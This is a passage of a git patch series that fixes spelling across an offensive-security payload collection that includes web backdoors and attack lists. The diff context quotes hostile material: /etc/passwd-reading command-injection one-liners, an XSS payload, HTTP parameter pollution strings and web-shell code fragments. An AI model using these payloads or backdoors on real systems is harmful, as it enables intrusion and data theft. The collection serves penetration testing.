 web-backdoors/php/proxy.php                  | 2 +-
 web-backdoors/php/shell.php                  | 2 +-
 web-backdoors/wordpress/templates/dns.php    | 2 +-
 web-backdoors/wordpress/templates/file.php   | 2 +-
 web-backdoors/wordpress/templates/host.php   | 2 +-
 web-backdoors/wordpress/templates/killnc.php | 2 +-
 web-backdoors/wordpress/templates/proxy.php  | 2 +-
 web-backdoors/wordpress/templates/shell.php  | 2 +-
 12 files changed, 12 insertions(+), 12 deletions(-)

diff --git a/web-backdoors/php/dns.php b/web-backdoors/php/dns.php
index 3b6f65b1..71a8c57f 100644
--- a/web-backdoors/php/dns.php
+++ b/web-backdoors/php/dns.php
@@ -60,7 +60,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/php/file.php b/web-backdoors/php/file.php
index 83758ae5..be622b75 100644
--- a/web-backdoors/php/file.php
+++ b/web-backdoors/php/file.php
@@ -61,7 +61,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/php/host.php b/web-backdoors/php/host.php
index acedb4b3..362611af 100644
--- a/web-backdoors/php/host.php
+++ b/web-backdoors/php/host.php
@@ -59,7 +59,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/php/killnc.php b/web-backdoors/php/killnc.php
index 8b6b026a..24017a68 100644
--- a/web-backdoors/php/killnc.php
+++ b/web-backdoors/php/killnc.php
@@ -62,7 +62,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/php/proxy.php b/web-backdoors/php/proxy.php
index b9bed910..e3807a37 100644
--- a/web-backdoors/php/proxy.php
+++ b/web-backdoors/php/proxy.php
@@ -62,7 +62,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/php/shell.php b/web-backdoors/php/shell.php
index c0c2d3e9..5713a2c8 100644
--- a/web-backdoors/php/shell.php
+++ b/web-backdoors/php/shell.php
@@ -68,7 +68,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/dns.php b/web-backdoors/wordpress/templates/dns.php
index 7107431b..4d4f1bc4 100644
--- a/web-backdoors/wordpress/templates/dns.php
+++ b/web-backdoors/wordpress/templates/dns.php
@@ -43,7 +43,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/file.php b/web-backdoors/wordpress/templates/file.php
index d80a2ae0..181ae251 100644
--- a/web-backdoors/wordpress/templates/file.php
+++ b/web-backdoors/wordpress/templates/file.php
@@ -47,7 +47,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/host.php b/web-backdoors/wordpress/templates/host.php
index aff4ac3d..726e0db1 100644
--- a/web-backdoors/wordpress/templates/host.php
+++ b/web-backdoors/wordpress/templates/host.php
@@ -43,7 +43,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/killnc.php b/web-backdoors/wordpress/templates/killnc.php
index 0c985872..2442243d 100644
--- a/web-backdoors/wordpress/templates/killnc.php
+++ b/web-backdoors/wordpress/templates/killnc.php
@@ -46,7 +46,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/proxy.php b/web-backdoors/wordpress/templates/proxy.php
index c81c5f13..c687c812 100644
--- a/web-backdoors/wordpress/templates/proxy.php
+++ b/web-backdoors/wordpress/templates/proxy.php
@@ -47,7 +47,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/shell.php b/web-backdoors/wordpress/templates/shell.php
index 394efa63..1e411411 100644
--- a/web-backdoors/wordpress/templates/shell.php
+++ b/web-backdoors/wordpress/templates/shell.php
@@ -47,7 +47,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-opertor (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarely makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {

From 56796d1f98f58594419932d82a737aa19404571e Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:12 -0400
Subject: [PATCH 30/59] spelling: parameter

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/http-protocol/hpp.txt | 2 +-
 web-backdoors/asp/proxy.asp  | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/attack/http-protocol/hpp.txt b/attack/http-protocol/hpp.txt
index 431ff431..e84ccdef 100644
--- a/attack/http-protocol/hpp.txt
+++ b/attack/http-protocol/hpp.txt
@@ -1,4 +1,4 @@
-# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
+# HTTP parameter polution and interpretation payloads by Jacco van Tuijl
 ?id=id=1
 &id=1?id=2
 ?id['&id=1']=2
diff --git a/web-backdoors/asp/proxy.asp b/web-backdoors/asp/proxy.asp
index edf12799..82ee44bc 100644
--- a/web-backdoors/asp/proxy.asp
+++ b/web-backdoors/asp/proxy.asp
@@ -130,7 +130,7 @@ Dim r
 	r.IgnoreCase = true
 	r.Global = true
 
-	' remove the laudurl paramater 
+	' remove the laudurl parameter 
 	r.Pattern = "laudurl=[^&]+($|&)"
 	CleanFormValues = r.Replace(request.form, "") 
 	Set r = nothing

From 21cd5036891d66a28ef62e5791431a13513e492d Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:13 -0400
Subject: [PATCH 31/59] spelling: parameters

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/pl-cgi/up.pl | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/web-backdoors/pl-cgi/up.pl b/web-backdoors/pl-cgi/up.pl
index 5692239b..5b22c64c 100755
--- a/web-backdoors/pl-cgi/up.pl
+++ b/web-backdoors/pl-cgi/up.pl
@@ -261,7 +261,7 @@ sub doWork
     ##################
 
 
-    # import the paramets into a series of variables in 'q' namespace
+    # import the parameters into a series of variables in 'q' namespace
     $query->import_names('q');
     #  check if the necessary fields are empty or not
     #$em .= "<br>You must specify your Userid!<br>" if !$q::userid;

From 884e5e6a6b447c490c04e8436d103cc4a524d3cb Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:15 -0400
Subject: [PATCH 32/59] spelling: pollution

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/http-protocol/hpp.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/attack/http-protocol/hpp.txt b/attack/http-protocol/hpp.txt
index e84ccdef..e2f16a40 100644
--- a/attack/http-protocol/hpp.txt
+++ b/attack/http-protocol/hpp.txt
@@ -1,4 +1,4 @@
-# HTTP parameter polution and interpretation payloads by Jacco van Tuijl
+# HTTP parameter pollution and interpretation payloads by Jacco van Tuijl
 ?id=id=1
 &id=1?id=2
 ?id['&id=1']=2

From 1d109ed16d8486dadf4b1fae1db6a5ca922f8467 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:16 -0400
Subject: [PATCH 33/59] spelling: popularity

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
index f9016dc9..cd62bf98 100644
--- a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
+++ b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
@@ -746,7 +746,7 @@ <h2><span id="ferruh">ferruh.mavituna</span></h2>
 				Bunun yan&#305;nda <a href="/projects-browse/">projeler</a> de geli&#351;tirdi&#287;im projeleri, <a href="/white-papers-browse/">ar-ge</a> k&#305;sm&#305;nda g&#252;venlik ara&#351;t&#305;rma dok&#252;manlar&#305;ma ula&#351;abilir, <a href="/applications-browse/">programlar</a> k&#305;sm&#305;ndan yazd&#305;&#287;&#305;m yaz&#305;l&#305;mlar&#305; download edebilirsiniz. <a href="/hakkinda-oku/">Site hakk&#305;nda.</a> </p>
 			</div>
 			<div class="aboute">
-				<p>List of <a href="/tag/english/">english articles</a>, <a href="/search/?s=1&AnyTag=&Tags=english&q=&SearchTitle=&SearchArticle=&SearchTitle=&ExactMatch=&Asc=&Order=&StartDate=&EndDate=&Featured=&OrderByTalk=&OrderByPopulatity=&RSS=1">RSS</a> or <a href="/english-browse/"> try this page</a>.</p>
+				<p>List of <a href="/tag/english/">english articles</a>, <a href="/search/?s=1&AnyTag=&Tags=english&q=&SearchTitle=&SearchArticle=&SearchTitle=&ExactMatch=&Asc=&Order=&StartDate=&EndDate=&Featured=&OrderByTalk=&OrderByPopularity=&RSS=1">RSS</a> or <a href="/english-browse/"> try this page</a>.</p>
 			</div>
 
 		</div>

From 49ca85b96f8f232633767a5b24956bb9fefb6d4f Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:17 -0400
Subject: [PATCH 34/59] spelling: possible

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/sql-injection/exploit/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/attack/sql-injection/exploit/README.md b/attack/sql-injection/exploit/README.md
index 7401cb1e..f33323d9 100644
--- a/attack/sql-injection/exploit/README.md
+++ b/attack/sql-injection/exploit/README.md
@@ -11,7 +11,7 @@ various useful post-exploitation commands
 **mysql-injection-login-bypass.fuzz.txt**
 * regex replace as many as you can with your fuzzer for best results:
 * <user-fieldname> <pass-fieldname> <username> 
-* also try to brute force a list of possible usernames, including possile admin acct names
+* also try to brute force a list of possible usernames, including possible admin acct names
 
 **mysql-read-local-files.fuzz.txt**
 * mysql local file disclosure through sqli

From e780f8fc74e24200c0ba67a26993c649ef817e54 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:19 -0400
Subject: [PATCH 35/59] spelling: postgre

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
index cd62bf98..e08b0043 100644
--- a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
+++ b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
@@ -498,7 +498,7 @@ <h2>ChangeLog</h2>
 
   <li>30/03/2007 v1.3 
     <ul>
-      <li>Niko pointed out PotsgreSQL and PHP supports stacked queries </li>
+      <li>Niko pointed out PostgreSQL and PHP supports stacked queries </li>
 
       <li>Bypassing second MD5 check login screens description and attack added </li>
 

From 9cdf482a87b819125418970aa382e469ab400be5 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:20 -0400
Subject: [PATCH 36/59] spelling: present

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/shell.php                 | 2 +-
 web-backdoors/wordpress/templates/shell.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/web-backdoors/php/shell.php b/web-backdoors/php/shell.php
index 5713a2c8..25070cf1 100644
--- a/web-backdoors/php/shell.php
+++ b/web-backdoors/php/shell.php
@@ -330,7 +330,7 @@ function init() {
 
 <?php
 if (!$_SESSION['authenticated']) {
-    /* Generate a new nounce every time we preent the login page.  This binds
+    /* Generate a new nounce every time we present the login page.  This binds
      * each login to a unique hit on the server and prevents the simple replay
      * attack where one uses the back button in the browser to replay the POST
      * data from a login. */
diff --git a/web-backdoors/wordpress/templates/shell.php b/web-backdoors/wordpress/templates/shell.php
index 1e411411..8a94de95 100644
--- a/web-backdoors/wordpress/templates/shell.php
+++ b/web-backdoors/wordpress/templates/shell.php
@@ -310,7 +310,7 @@ function init() {
 
 <?php
 if (false) {
-    /* Generate a new nounce every time we preent the login page.  This binds
+    /* Generate a new nounce every time we present the login page.  This binds
      * each login to a unique hit on the server and prevents the simple replay
      * attack where one uses the back button in the browser to replay the POST
      * data from a login. */

From e5d24d655d3b7e5a7292fc2c4c3be1c8f2e219b5 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:21 -0400
Subject: [PATCH 37/59] spelling: privacy

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 regex/nsa-wordlist.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/regex/nsa-wordlist.txt b/regex/nsa-wordlist.txt
index ac1ba080..57c95f0b 100644
--- a/regex/nsa-wordlist.txt
+++ b/regex/nsa-wordlist.txt
@@ -5,7 +5,7 @@ Information Security
 Information Warfare
 IW
 IS
-Priavacy Information 
+Privacy Information 
 Terrorism
 Defensive
 Information Defense

From e844aced5b652d951972a14e931bfb6d8cffe0a4 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 21:11:42 -0400
Subject: [PATCH 38/59] spelling: program

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/jsp/browser.jsp | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/web-backdoors/jsp/browser.jsp b/web-backdoors/jsp/browser.jsp
index 3f1be0d0..20264d29 100755
--- a/web-backdoors/jsp/browser.jsp
+++ b/web-backdoors/jsp/browser.jsp
@@ -73,7 +73,7 @@
 	private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
 
 	/**
-	 * Command of the shell interpreter and the parameter to run a programm
+	 * Command of the shell interpreter and the parameter to run a program
 	 */
 	private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
 	//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; 	// Unix

From 1042280babfe4ffa48c1afa5bbf9a81577aa52b7 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:22 -0400
Subject: [PATCH 39/59] spelling: quote

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
index b8dec71c..d46eb8ee 100644
--- a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
+++ b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
@@ -518,8 +518,8 @@ Exploit Description: HTML entities (the semicolons are required for this to work
 Exploit Tags: general, evil tags, obfuscated, internet explorer
 Author Name: ha.ckers.org
 
-HTML Quoute & Comment breaker
-Exploit Name: HTML Quoute & Comment breaker
+HTML Quote & Comment breaker
+Exploit Name: HTML Quote & Comment breaker
 Exploit String: '';!--"<script>alert(0);</script>=&{(alert(1))}
 Exploit Description: This vector breaks HTML quotes and comments.
 Exploit Tags: general, html breaking, comment breaking

From fbe6306e93f83b137c5e03a396f4ea33e1aa9099 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:23 -0400
Subject: [PATCH 40/59] spelling: registered

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 discovery/WebSocket/WebSocket-subprotocols.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/discovery/WebSocket/WebSocket-subprotocols.txt b/discovery/WebSocket/WebSocket-subprotocols.txt
index 60b2f9b7..f83b4e98 100644
--- a/discovery/WebSocket/WebSocket-subprotocols.txt
+++ b/discovery/WebSocket/WebSocket-subprotocols.txt
@@ -1,5 +1,5 @@
 # this list can be used to enumerate supported Web Socket sub protocols of a web socket server
-# It contains the official IANA registerd Web Socket sub protocols
+# It contains the official IANA registered Web Socket sub protocols
 # Source: https://www.iana.org/assignments/websocket/websocket.xml
 # Example subprotocol request header:
 # Sec-WebSocket-Protocol: mqtt, wamp

From 01d777f7c901ac26f097cba8aee5812285d6cf34 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:24 -0400
Subject: [PATCH 41/59] spelling: reproducibility

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/misc/KL0209LIT_fffap.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/misc/KL0209LIT_fffap.html b/docs/misc/KL0209LIT_fffap.html
index c4d0d6c9..ededa98f 100644
--- a/docs/misc/KL0209LIT_fffap.html
+++ b/docs/misc/KL0209LIT_fffap.html
@@ -89,7 +89,7 @@
 
 Fuzzing includes a lot of testing. You could spend hours and hours modifying and compiling and running the same but slightly
 different code over and over just to get the better results. Planning, preparation, and testing are a part of fuzzing, and
-laboring hours on end for the humble task of perfection, stability, and reproduceability can thankfully be very rewarding.
+laboring hours on end for the humble task of perfection, stability, and reproducibility can thankfully be very rewarding.
 
 Fuzzing is useful because...
 

From 02e940ee32a457a2eea7120342121a31c89640fd Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:25 -0400
Subject: [PATCH 42/59] spelling: retrieve

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/os-cmd-execution/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/attack/os-cmd-execution/README.md b/attack/os-cmd-execution/README.md
index 8115c9d4..965aa625 100644
--- a/attack/os-cmd-execution/README.md
+++ b/attack/os-cmd-execution/README.md
@@ -30,14 +30,14 @@ Example IFS netcat backdoor without spaces:<br>
 
 $IFS shell variable:<br>
 ``` cat$IFS/etc/passwd ```<br>
-increment the first +1 to retreive the entire file, line by line<br>
+increment the first +1 to retrieve the entire file, line by line<br>
 ``` cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1 ```
 
 Shell Variables:<br>
 ``` CMD=$'cat\x20/etc/passwd';$CMD ```
 
 shell variable, increment through file one line at a time: <br>
-increment the first +1 to retreive the entire file, line by line<br>
+increment the first +1 to retrieve the entire file, line by line<br>
 ``` SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1 ```
 
 **Exfiltrating Files / Data**

From ded71112e1aa28ff1140643e9a2450ba431645e3 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:26 -0400
Subject: [PATCH 43/59] spelling: rudimentary

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/wordpress/templates/ipcheck.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/web-backdoors/wordpress/templates/ipcheck.php b/web-backdoors/wordpress/templates/ipcheck.php
index fe27d70c..2ced265e 100644
--- a/web-backdoors/wordpress/templates/ipcheck.php
+++ b/web-backdoors/wordpress/templates/ipcheck.php
@@ -16,7 +16,7 @@
 ***
 ********************************************************************************
 ***
-*** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools
+*** This file provides a rudimentary IP filter to help prevent usage of Laudanum tools
 *** by someone other than the person who uploaded Laudanum.  This file should be included
 *** in other Laudanum tools and not called directly. 
 *** Written by Jason Gillam <jgillam@secureideas.com>

From 8668b786a4e16615c7f289197b94407829b8aa38 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:27 -0400
Subject: [PATCH 44/59] spelling: secret

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 regex/nsa-wordlist.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/regex/nsa-wordlist.txt b/regex/nsa-wordlist.txt
index 57c95f0b..a1b021fd 100644
--- a/regex/nsa-wordlist.txt
+++ b/regex/nsa-wordlist.txt
@@ -36,7 +36,7 @@ CIA
 S/Key
 SSL
 FBI
-Secert Service
+Secret Service
 USSS
 Defcon
 Military

From 26956a63e79c22f2f765f8baf4cd7aa830793067 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:28 -0400
Subject: [PATCH 45/59] spelling: select all

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/jsp/browser.jsp | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/web-backdoors/jsp/browser.jsp b/web-backdoors/jsp/browser.jsp
index 20264d29..cd55f373 100755
--- a/web-backdoors/jsp/browser.jsp
+++ b/web-backdoors/jsp/browser.jsp
@@ -1570,7 +1570,7 @@ Upload finished.
 		for(var x=0;x<document.FileList.elements.length;x++){
 			var y = document.FileList.elements[x];
 			var ytr = y.parentNode.parentNode;
-			var check = document.FileList.selall.checked;
+			var check = document.FileList.selectAll.checked;
 			if(y.name == 'selfile'){
 				if (y.disabled != true){
 					y.checked = check;
@@ -1754,7 +1754,7 @@ Upload finished.
 				}
 			}%>
 	</table>
-	<input type="checkbox" name="selall" onClick="AllFiles(this.form)">Select all
+	<input type="checkbox" name="selectAll" onClick="AllFiles(this.form)">Select all
 	<p align=center>
 		<b title="<%=totalSize%> bytes">
 		<%=convertFileSize(totalSize)%></b><b> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%>

From de175d02cc1f1b27791354850dc911e10138f68d Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:29 -0400
Subject: [PATCH 46/59] spelling: self-contained

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
index d46eb8ee..27a9eddf 100644
--- a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
+++ b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
@@ -876,8 +876,8 @@ Exploit Description: This vector was once used on a major site to evade a stripp
 Exploit Tags: general, injection, gecko, style injection, XBL
 Author Name: PHPIDS Group
 
-Multiline selfcontained XSS
-Exploit Name: Multiline selfcontained XSS
+Multiline self-contained XSS
+Exploit Name: Multiline self-contained XSS
 Exploit String: _
 =
 eval

From 35cce880186dd6c44bf9abe6e9da552797617af0 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:35 -0400
Subject: [PATCH 47/59] spelling: separated

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/jsp/browser.jsp | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/web-backdoors/jsp/browser.jsp b/web-backdoors/jsp/browser.jsp
index cd55f373..3d10dbd6 100755
--- a/web-backdoors/jsp/browser.jsp
+++ b/web-backdoors/jsp/browser.jsp
@@ -34,7 +34,7 @@
     //If true, the user is allowed to browse only in RESTRICT_PATH,
     //if false, the user is allowed to browse all directories besides RESTRICT_PATH
     private static final boolean RESTRICT_WHITELIST = false;
-    //Paths, sperated by semicolon
+    //Paths, separated by semicolon
     //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
 	private static final String RESTRICT_PATH = "/etc;/var";
 

From 523b25b878db2dca863fc80bd441514c3c50f37d Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:30 -0400
Subject: [PATCH 48/59] spelling: separator

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/shell.php                 | 2 +-
 web-backdoors/wordpress/templates/shell.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/web-backdoors/php/shell.php b/web-backdoors/php/shell.php
index 25070cf1..4373f361 100644
--- a/web-backdoors/php/shell.php
+++ b/web-backdoors/php/shell.php
@@ -147,7 +147,7 @@ function stripslashes_deep($value) {
 //if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && 
 //    isset($ini['users'][$username])) {
 //    if (strchr($ini['users'][$username], ':') === false) {
-//        // No seperator found, assume this is a password in clear text.
+//        // No separator found, assume this is a password in clear text.
 //        $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
 //    } else {
 //        list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
diff --git a/web-backdoors/wordpress/templates/shell.php b/web-backdoors/wordpress/templates/shell.php
index 8a94de95..70e72387 100644
--- a/web-backdoors/wordpress/templates/shell.php
+++ b/web-backdoors/wordpress/templates/shell.php
@@ -126,7 +126,7 @@ function wpl_stripslashes_deep($value) {
 //if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && 
 //    isset($ini['users'][$username])) {
 //    if (strchr($ini['users'][$username], ':') === false) {
-//        // No seperator found, assume this is a password in clear text.
+//        // No separator found, assume this is a password in clear text.
 //        $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
 //    } else {
 //        list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);

From 95a03ae069ed045b01016710f0f3d973e5e2444c Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:31 -0400
